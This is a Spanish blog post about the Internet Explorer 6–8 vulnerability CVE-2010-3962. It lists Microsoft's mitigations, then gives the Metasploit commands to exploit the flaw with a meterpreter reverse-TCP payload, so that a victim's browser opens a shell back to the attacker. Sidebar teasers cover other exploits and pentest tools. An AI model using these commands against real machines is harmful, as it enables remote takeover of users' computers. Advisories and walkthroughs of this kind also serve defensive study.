¡La Informática al límite!
RCE en Internet Explorer 6, 7 y 8
Información
Microsoft publicó un boletín informando de una vulnerabilidad (CVE-2010-3962) que afecta a varias de las versiones soportadas de su navegador Internet Explorer 6, 7 y 8; la cual están investigando y por el momento no tiene un parche de solución.
El principal impacto que puede generar esta vulnerabilidad es la ejecución remota de código (RCE -Remote Code Execution-).
El boletín de Microsoft provee soluciones provisionales para evitar la amenaza, las cuales son:
- Evitar el estilo CSS del sitio usando estilos CSS definidos por el usuario
- Utilizar el kit de herramientas EMET
- Utilizar la protección DEP para IE 7
- Leer correos en modo texto
- Fijar las zonas de Intranet e Internet en modo de seguridad “Alto” para bloquear los controles ActiveX y el Active Scripting en esas zonas.
También se informa que el Internet Explorer 9 (Beta) no es afectado y se puede usar sin problemas. En el caso de Internet Explorer 8 en su instalación con valores por defecto es poco probable que sea afectado ya que ofrece la protección DEP.
Explotando Vulnerabilidad
El módulo explota una vulnerabilidad de corrupción de memoria en el motor HTML de Microsoft (MSHTML). Al analizar una página HTML que contiene una etiqueta especialmente diseñada en CSS provoca la corrupción de memoria lo que conlleva a la ejecución de código arbitrario.
Exploit
use exploit/windows/browser/ms10_xxx_ie_css_clip
Payload
set PAYLOAD windows/meterpreter/reverse_tcp
Comandos del Metasploit
use exploit/windows/browser/ms10_xxx_ie_css_ clip
set SRVHOST IP
set payload windows/meterpreter/reverse_tcp
set LHOST IP
exploit
Video
Debido a algunos problemas con mis máquinas virtuales, opté por poner un vídeo de un tercero.
Referencias
| Este artículo fue publicado por WindHack el 3 diciembre, 2010 a las 8:13 PM, y está archivado en Inseguridad Informática, Noticias. Sigue las respuestas a esta entrada a través de RSS 2.0. Puedes dejar un comentario o enviar un trackback desde tu propio sitio. |
Aún no hay comentarios.
Aún no hay trackbacks.
Grave vulnerabilidad en PHP-CGI
hace 1 semana - No hay comentarios
Grave vulnerabilidad en PHP-CGI Importancia: 5 – Crítica Fecha de publicación: 03/05/2012 Recursos afectados Servidores web con PHP ejecutándose como CGI. Descripción Posibilita el paso de parámetros al intérprete, lo que permite la ejecución de código arbitrario y la revelación de información confidencial. Solución Ya existen módulos de la herramienta de pentesting y hacking metasploit…
Funciones reducidas en Python
hace 3 semanas - No hay comentarios
Hola a todos, La idea de esta entrada es poner las funciones reducidas que he y hayan programado. Lo ideal es ver cuán cortas pueden ser.- Aquí comparto algunas strlen / len Forma normal def s(x): i = 0 for l in x: i += 1 return i Forma corta def l(x): return sum(1 for…
Wapiti – Web application vulnerability scanner
hace 7 meses - 1 comentario
Wapiti es una aplicación que permite auditar la seguridad de sus aplicaciones web. No estudia el código fuente de la aplicación, pero va a escanear las páginas web de la webapp, en busca de scripts y de formas en las que se puedan inyectar datos. Posteriormente, Wapiti actúa como un fuzzer, inyectando payloads para ver si es vulnerable.…
Cross Site Scripting en jQuery 1.6
hace 8 meses - No hay comentarios
Se ha arreglado una vulnerabilidad que permitía realizar ataques Cross Site Scripting (XSS) en jQuery 1.6. La vulnerabilidad podía ser explotada en ciertos sitios que utilizaran la variable ‘location.hash’ en un contexto que no fuera el de Cascading Style Sheets (CSS). jQuery es una biblioteca o framework javascript de software libre y código abierto. Es compatible con la mayoría…
Routerpwn, un framework para explotar dispositivos embebidos
hace 9 meses - No hay comentarios
Routerpwn.com es una aplicación web que permite y ayuda a explotar las vulnerabilidades en algunos routers. Es un conjunto de exploits listos para correr de forma local y remota. Está programado en JavaScript y HTML, y está optimizada para correr en SmartPhones y otros dispositivos de internet móviles. Es sólo un archivo HTML…
Inyección masiva de iframes a sitios de e-commerce
hace 9 meses - No hay comentarios
Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando.…
Variaciones: Sucesión de Fibonacci
hace 10 meses - 3 comentarios
Pasando el tiempo, me dio por leer un poco sobre la Sucesión de Fibonacci. Gracias a ello, hice en Python dos formas para realizar esta sucesión No siendo más, aquí os las dejo: from math import sqrt, pow def f(x): return ((1/sqrt(5))*pow(((1+sqrt(5))/(2)),x)-(1/sqrt(5))*pow(((1-sqrt(5))/(2)),x)) Usando el número áureo from math import sqrt, pow a =…
XSSPloit: Un escáner de vulnerabilidades XSS
hace 10 meses - 1 comentario
XSSploit es un escáner multi-plataforma de Cross-Site Scripting y exploiter escrito en Python. Se ha desarrollado para ayudar a descubrir y explotar las vulnerabilidades XSS en pruebas de penetración. Cuando se utiliza, XSSploit primero se arrastra todo el sitio web e identifica las formas encontradas. A continuación, analiza estas formas de detectar automáticamente las vulnerabilidades…
Google lanza una herramienta para detectar vulnerabilidades en aplicaciones web
hace 10 meses - No hay comentarios
Google ha lanzado una nueva herramienta denominada DOM Snitch destinada a desarrolladores que permite verificar si las aplicaciones web que han creado son vulnerables a ataques y ponen en peligro la seguridad de los usuarios de Chrome. La herramienta que lanza Google es una extensión de Chrome en fase experimental permite a los desarrolladores y…
CodeRun, el entorno de desarrollo ( IDE ) en la nube
hace 11 meses - No hay comentarios
CodeRun es un entorno de desarrollo online/en la nube, en el cual los desarrolladores podrán trabajar en sus proyectos estén donde estén. Para facilitar aún más las cosas, el aspecto visual se ha cuidado mucho para obtener una interfaz bastante agradable. Usar CodeRun y registrarnos es gratuito y a la hora de crear un nuevo proyecto podemos elegir entre: C#,…
